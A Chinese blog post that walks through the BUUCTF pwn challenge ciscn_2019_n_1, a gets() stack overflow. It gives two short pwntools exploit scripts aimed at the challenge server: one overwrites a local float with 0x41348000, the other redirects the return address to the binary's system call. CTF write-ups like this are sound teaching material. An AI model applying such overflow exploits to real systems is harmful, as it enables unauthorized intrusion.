[BUUCTF-pwn]——ciscn_2019_n_1

最新推荐文章于 2024-04-14 00:09:22 发布
最新推荐文章于 2024-04-14 00:09:22 发布
阅读量883 收藏 4
点赞数 12
分类专栏: # BUUCTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Y_peak/article/details/113454489
版权

[BUUCTF-pwn]——ciscn_2019_n_1

  • 题目地址:https://buuoj.cn/challenges#ciscn_2019_n_1
  • 题目:在这里插入图片描述
    老规矩下载下来后,在Linux上checksec一下,64位,并且没有开启栈保护,意味着我们可以利用栈溢出
    在这里插入图片描述
    在IDA中看一下,main函数里面没有什么可以利用的
    在这里插入图片描述
    双击func函数看看,就是我们想要的。在这里插入图片描述

思路一 —— 覆盖局部变量

我们只需要让v2的值等于11.28125即可。而v2又没有办法直接输入,但是v1是利用gets这个典型的栈溢出函数输入的。v2和v1之间的距离为0x30 - 0x4。下面我们只需要计算一下11.28125的16进制储存方式就好。

11.28125 转换为二进制为 1011.01001
11.28125 在计算机内部储存为 0100 0001 0011 0100 1000 0000 0000 000011.28125 ==> 0x41348000

也可以用代码计算

#include <stdio.h>
int main()
{
	float a = 11.28125;
	unsigned char *p = (unsigned char*)&a;
	printf("0X%02x%02x%02x%02x",(int)p[3],(int)p[2],(int)p[1],(int)p[0]);
	return 0;
}

这个思路的exploit就是

from pwn import *
p = remote("node3.buuoj.cn",xxxx)
ans = 0x41348000
payload = 'a'*(0x30 - 0x4) + p64(ans)
p.sendline(payload)
p.interactive()

思路二 —— 覆盖返回地址

找到func函数,在里面找到system函数的位置,覆盖返回地址。找到system函数压参数的位置0x4006BE,v1距离ebp 0x30,ebp8个字节在这里插入图片描述
所以该思路的expolit可以这样写

from pwn import *
p = remote("node3.buuoj.cn",xxxx)
ret_arr = 0x4006BE
payload = 'a'*(0x30 + 0x8) + p64(ret_arr)
p.sendline(payload)
p.interactive()

总体来说,两个思路都很简单,不过第一个需要算那个十六进制有点麻烦,还百度查看了一下,浮点数的储存。

有帮助就点个赞呀 😃

Y-peak
关注
  • 12
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
【CTF】ciscn_2019_n_1和pwn1_sctf_2016--栈溢出
最新发布
qq_48201589的博客
04-14 211
BUUICTF的ciscn_2019_n_1和pwn1_sctf_2016--栈溢出类型解题思路
baby_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
04-22
baby_pwn 赛题 ciscn 2019 第十二届全国大学生信息安全竞赛
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
ciscn-2019-pwn
11-29
1. baby_pwn 2. bms 3. daily 4. Double 5 your_pwn
ciscn_2019_n_3
12-30
ciscn(全国大学生信息安全竞赛),2019年的一道题目,涉及到fastbin堆漏洞的利用。由于调用了system函数,所以漏洞利用的难度不大,推荐初学者练习。题解链接:https://blog.csdn.net/A951860555/article/details/111991072
ciscn_2019_n_1 ——两种解法
qq_41696518的博客
07-13 2462
ciscn_2019_n_1 两种解法
2021_09_15_ciscn_2019_n_1
m0_51187558的博客
09-15 2713
ciscn_2019_n_1 前言 每日一题pwn方向的第二题。也是初入漏洞利用的一道特别基础的题。 大家都应该尝试着做过了上一道,也就是test your nc。从解法来说其实那道题的难度真的只是半脚踩在入门的门坎上。就像wp中所说的那样,目前pwn题的核心是通过漏洞挖掘与利用来提权,而nc这道题可以说是不需要任何漏洞的挖掘与利用,做出这道题并不代表你已经入门pwn了。 虽然如此,从ciscn_2019_n_1这道题开始,我们真正要开始尝试迈过pwn题的那一道门槛,面对一些简单的漏洞进行利用了。 做题流程
ciscn_2019_n_1
weixin_56301399的博客
07-20 338
还是一道栈溢出的题,我们在那个可疑的函数里发现有两个变量,v1,v2,其中只有v1可以通过gets()函数输入,但我们的判断的条件是v2=??一个数,我们如和更改v2值呢,答案是通过v1的溢出来改变v2里的值。.........
BUUCTF|PWN-ciscn_2019_n_1-WP
l2645470582_的博客
07-28 241
1、下载文件并开启靶机 2、在Linux系统中查看该文件信息 checksec ciscn_2019_n_1 3、文件查出来是64位文件,我们用64位IDA打开该文件 3.1、shift+f12查看关键字符串 3.2、双击关键字符串cat/flag,再按F5进入反编译代码区 3.3、cat/flag地址为 v1地址: r返回地址: 4、编译代码 #encoding=utf-8 from pwn imp...
BUUCTF Pwn ciscn_2019_n_1 1
qq_45200829的博客
11-08 309
BUUCTF Pwn类型 ciscn_2019_n_1 1 解题过程
BUUCTF-PWN-ciscn_2019_n_1
m0_64180167的博客
04-13 269
我们可以使用栈溢出 我们看看 v1函数的地址 是30h 然后是64位的 所以 基地址是8字节。我们发现了system 然后get()函数。所以发现system的地址 开始写exp。发现是64位的 然后 放入ida。我们开始查看 system的地址。发现 cat flag。
PWN学习记录(4)BUUCTF-ciscn_2019_n_1
m0_58824086的博客
08-05 116
下载题目得到ciscn_2019_n_1,利用 file 命令查看该文件的类型,再通过checksec ./filename查看保护机制。将文件放入IDA中查看,打开字符串窗口。没有发现 /bin/sh,但找到了cat flag.txt。打开终端,输入vim 1.py 创建一个python文件(命名随意)NX enabled如果这个保护开启就是意味着栈中数据没有执行权限。将exp文件输入进1.py中,Esc+:wq保存并退出1.py。双击cat flag.text。打开main,F5反编译。
以题目:ciscn_2019_n_1来详细学习dbg和pwntools
WdIg-2023的博客
01-21 1004
我们在做Linux平台下的pwn题目的时候,调试是必不可少的一步,在调试的过程中找到漏洞并用pwntools写出攻击脚本。
[BUUCTF]PWN------ciscn_2019_n_1
BangSen1的博客
01-16 247
ciscn_2019_n_1 例行检查,64bit,NX保护开启 运行一下,没有信息 64位IDA打开,看到了cat flag ,跟进瞧瞧 函数显示 ,当v2等于11.28125时,得到flag,但要求 我们输入的是v1,所以我们只有把v1和v2 之间全部填满之后紧接着写入11.28125即可。 我们可以看到这两个之间的大小为0x2C 再将11.28125转换为内存中的16进制,结果为 0x41348000 摘自 exp 得到FLAG ...
BUU刷题-Pwn-ciscn_2019_n_1
一个啥也不会的小菜鸡!
06-23 96
在rodate段,可以找到11.28125的十六进制表示形式为0x41348000h。要将V2变为11.28125,必须知道11.28125的十六进制表示形式。利用栈溢出覆盖v2改变其值,获得flag。[[双精度浮点数存储]]
BugkuCTF web extract变量覆盖
H4ppyD0g的博客
09-15 294
<?php $flag='xxx'; extract($_GET); if(isset($shiyan)) { $content=trim(file_get_contents($flag)); if($shiyan==$content) { echo'flag{xxx}'; } else { echo'Oh.no'; } } ?> extract() 函数从数组中将变量导入到当前的符...
buuctf [HarekazeCTF2019]baby_rop2
09-30
[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop2是一个pwn题目。在这个题目中,主要的目标是获取read函数的地址,并利用该地址泄漏libc基址,然后计算system函数和/bin/sh字符串的地址,最终执行system('/bin/sh')获取...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值